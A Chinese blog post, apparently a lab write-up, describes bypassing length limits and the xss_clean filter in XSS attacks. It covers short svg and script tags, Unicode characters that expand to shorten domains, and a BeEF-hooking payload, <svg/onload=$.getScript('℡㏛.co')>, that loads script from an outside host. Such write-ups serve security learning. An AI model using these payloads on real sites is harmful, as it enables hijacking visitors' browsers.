当前位置:网站首页>限制字符绕过
限制字符绕过
2022-07-31 00:00:00 【Miracle_ze】
字符短域名绕过
一、绕过方法
1.1 重写,使用短标签
<svg/onload = ‘’ >
<script/ src = ’ ’ >
1.2 Unicode中多字符表示单字符
以下特殊字符会被html识别为单个字符
- ff expands to
ff- ℠ expands to
sm- ㏛ expands to
sr- st expands to
st- ㎭ expands to
rad- ℡ expands to
tel
1.3 实体编码html
二、限制长度短字符短域名绕过
2.1 xss_clean 过滤语句
使用beef工具开始尝试xss注入,首先使用基础语句实现弹窗<script>alert(1)</script>
添加结果:
由上图可见 被xss_clean过滤了注入失败。
为此我们删除xss_clean 来测试是否因为它而被过滤
结果表示xss_clean造成被过滤原因就是xss_clean
值得注意的是在当前xss_clean版本忽略了svg,为此我们可以使用svg注入
再次刷新页面同样显示
2.2
在观察前端引用文件时发现使用了jQuery
因此可以使用<svg/onload=$.getScript(‘℡㏛.co’)>注入,使用老师的telsr.co的域,是缩短了的即为5个字符。但是这个网站是老师提供的外网,我没有vpn因此选择了自己的。因此修改里字符限制长度
成功获取获取,在beef查看。
beef获取成功成功绕过。
三、kali的beef安装
边栏推荐
猜你喜欢
firewalld
vscode上利用screen命令跑代码
joiplay模拟器如何调中文
Steven Giesel recently published a 5-part series documenting his first experience building an application with the Uno Platform.
Steven Giesel 最近发布了一个由5部分内容组成的系列,记录了他首次使用 Uno Platform 构建应用程序的经验。
transition transition && animation animation
HCIP第十六天笔记
PS Basic Learning (1)
46.<list链表的举列>
firewalld
随机推荐
46.
How to adjust Chinese in joiplay simulator
How to Repair Word File Corruption
状态机动态规划之股票问题总结
HCIP Day 15 Notes
leetcode:127. 单词接龙
10 个关于自动化发布管理的好处
What are the efficient open source artifacts of VSCode
How to ensure the consistency of database and cache data?
软考总结
Necessary artifacts - AKShare quants
2D Transform Module && Media Queries
Summary of the stock problem of state machine dynamic programming
.NET 跨平台应用开发动手教程 |用 Uno Platform 构建一个 Kanban-style Todo App
怎么开通代付通道接口?
The first level must project independently
Shell编程条件语句 test命令 整数值,字符串比较 逻辑测试 文件测试
【LeetCode】70. 爬楼梯 - Go 语言题解
In MySQL, the stored procedure cannot realize the problem of migrating and copying the data in the table
How to import game archives in joiplay emulator